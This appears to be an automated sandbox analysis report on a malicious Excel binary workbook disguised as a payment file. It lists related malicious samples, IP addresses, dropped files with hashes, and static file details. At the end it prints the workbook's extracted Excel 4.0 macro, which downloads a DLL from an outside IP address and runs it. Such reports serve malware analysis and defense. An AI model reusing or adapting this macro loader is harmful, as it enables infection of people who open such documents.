                                                                                                                                                    • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, prod.configsvc1.live.com.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, l-0014.l-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    185.180.199.125INDIV_PAYM_633854-506518488.xlsbGet hashmaliciousBrowse
                                                                                                                                                      transfer_summ_188108012.xlsbGet hashmaliciousBrowse
                                                                                                                                                        pmnt_spec_031624191.xlsbGet hashmaliciousBrowse

                                                                                                                                                          Domains

                                                                                                                                                          No context

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          HOSTING-SOLUTIONSUSwKZLXCcVCB.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.126
                                                                                                                                                          wKZLXCcVCB.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.126
                                                                                                                                                          INDIV_PAYM_633854-506518488.xlsbGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.125
                                                                                                                                                          transfer_summ_188108012.xlsbGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.125
                                                                                                                                                          pmnt_spec_031624191.xlsbGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.125
                                                                                                                                                          PO187439.exeGet hashmaliciousBrowse
                                                                                                                                                          • 185.162.128.35
                                                                                                                                                          Order_Summary-9632850.xlsbGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.121
                                                                                                                                                          Total_order_data-V2434883.xlsbGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.121
                                                                                                                                                          Delivery_Information_7038598.xlsbGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.199.121
                                                                                                                                                          W6DkFm55kO.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.248.225.14
                                                                                                                                                          Lma2EzVvAK.exeGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.250
                                                                                                                                                          wEcncyxrEeGet hashmaliciousBrowse
                                                                                                                                                          • 104.193.252.114
                                                                                                                                                          immed_paym_req_44191988.docGet hashmaliciousBrowse
                                                                                                                                                          • 185.159.82.194
                                                                                                                                                          zKOi8vCorq.exeGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.99
                                                                                                                                                          invoice_100221.docGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.135
                                                                                                                                                          new shippment.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.135
                                                                                                                                                          w3QgrgNAWs.exeGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.99
                                                                                                                                                          yWWZnMPf9D.exeGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.99
                                                                                                                                                          zLjBdL6Lbk.exeGet hashmaliciousBrowse
                                                                                                                                                          • 185.180.198.141
                                                                                                                                                          DHL_file094883764773845.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.244.32.175

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\32D16877-2932-4116-B7E2-AF8660BF4045
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):134914
                                                                                                                                                          Entropy (8bit):5.367832932766083
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:CcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:eEQ9DQW+zvXO1
                                                                                                                                                          MD5:B7B59A7EDAD01774AA453229E77F0C8D
                                                                                                                                                          SHA1:95E064290FE01E7848A779EC61396AD90763DF9C
                                                                                                                                                          SHA-256:E06A3D6CC920EAFB7935560C754F16244A72CE4030D9915644CEFC6D3C50DCF4
                                                                                                                                                          SHA-512:8052D1987A9558C80F4D1293942281F45B00427C9F2C5108AF947B9ABE8A5EC2C68C6296036F3DFE9E6E7E797A7FF76F358237A1C588C4CBA3003823865B4C48
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-23T15:15:27">.. Build: 16.0.14221.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\25DC4E34.png
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9924
                                                                                                                                                          Entropy (8bit):7.973758306371751
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                          MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                          SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                          SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                          SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\566CB0A5.png
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5744
                                                                                                                                                          Entropy (8bit):7.966496386988271
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                          MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                          SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                          SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                          SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E409B53F.png
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6177
                                                                                                                                                          Entropy (8bit):7.959095006853368
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                          MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                          SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                          SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                          SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EC05C8B6.png
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23989
                                                                                                                                                          Entropy (8bit):7.989754044300238
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
                                                                                                                                                          MD5:839795652A8FE78F26F4D86D757ABDE8
                                                                                                                                                          SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
                                                                                                                                                          SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
                                                                                                                                                          SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F203B662.png
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):956
                                                                                                                                                          Entropy (8bit):7.683552542542939
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
                                                                                                                                                          MD5:32C83607A5C98C5A634278E5AED3AD61
                                                                                                                                                          SHA1:EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
                                                                                                                                                          SHA-256:4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
                                                                                                                                                          SHA-512:AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]*....@.-.L..G.....Q."..%fb.Z*.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\12C10000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):79256
                                                                                                                                                          Entropy (8bit):7.89656586928475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:9+milem3l7eO+dRRVnyYPlMVGoIahaDHTU6hryF70cAeWvijWGH5c:9+wol7eO6RSYP2sTU2yF70cAijW25c
                                                                                                                                                          MD5:9CF56857BCBCEC1F9EACE1BC4D0419EE
                                                                                                                                                          SHA1:B0899EEBCFFF7D940023CA6E7C78E86E3E85619A
                                                                                                                                                          SHA-256:3A5E4A4F8A1C00BCA259EAC809E73EF95BB951FF602F44514259F773576DAC40
                                                                                                                                                          SHA-512:E21D9EF94AA378EE802D8B6D9C9D779430B0362AB509AD996613F416881418426B30B39FE94A46139E3BF67EAEA16BB89C1FB72D8053A043673A75606F3A653E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: .T.n.0....?..........C.c. ....X"...&..>CZq.8V...[.Q3....."j.Z6m&..'..k......U..S.x.-........n..+B;lY.R..9......p....D...A....L~s.]...9.|v.+qoRu....:V]..R-.6..:?.Xj..!B0Z.D.......j.%(/.-.i0D..{.dM..&...R.(......&:......^..Ia}..w.......0j...........z...9N...X.F.iJ...2.+'..hOh....RA"/..'$..$.O#WR.G|...:?.i3..3.eD.....\O....b...o.wG:....6Q[t.n.5.....c.....s.......> ..._O...3..D.1i.w....+R..|...u@..1>........PK..........!................[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22
                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                          C:\Users\user\Desktop\~$INDIV_PAYM_633854-324967143.xlsb
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):165
                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Microsoft Excel 2007+
                                                                                                                                                          Entropy (8bit):7.87583218315359
                                                                                                                                                          TrID:
                                                                                                                                                          • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                          • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                          File name:INDIV_PAYM_633854-324967143.xlsb
                                                                                                                                                          File size:63444
                                                                                                                                                          MD5:e963ef875c44ecf140507a4d7fcd8472
                                                                                                                                                          SHA1:83fbf79d1327c2d42e7b52b94d35f0090ffa7f4d
                                                                                                                                                          SHA256:c548e534358c07290a4bebebf723d8cc96f9889d940e4082157844642bc2a82b
                                                                                                                                                          SHA512:4a743fc9d41d55f8190129d452220e2531e243f144d4601c4f6be642f70d108df7178f0f710f78943a1ba5577907b115a9f7805e22d76ad5cdb740b056f4f6ac
                                                                                                                                                          SSDEEP:1536:4MTMXwc5jlMVGoIahaDHTU6hryF70liWWGH0AeWca:4MTi5j2sTU2yF70liWW20Ra
                                                                                                                                                          File Content Preview:PK..........!..<......z.......[Content_Types].xml ...(...................................................................................................................................%%....................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OpenXML
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "INDIV_PAYM_633854-324967143.xlsb"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:
                                                                                                                                                          Application Name:
                                                                                                                                                          Encrypted Document:
                                                                                                                                                          Contains Word Document Stream:
                                                                                                                                                          Contains Workbook/Book Stream:
                                                                                                                                                          Contains PowerPoint Document Stream:
                                                                                                                                                          Contains Visio Document Stream:
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:

                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                          CALL(UR, UR, JJC, 0, ht, ..\jbeiwmje.dll, 0, 0)
                                                                                                                                                          
                                                                                                                                                          ,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,185.180.199.125/s1.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\jbeiwmje.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(before.2.18.42.sheet!BK73&before.2.18.42.sheet!BK74&before.2.18.42.sheet!BK75&before.2.18.42.sheet!BN24),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT()"=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.2.18.42.sheet!BZ25(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,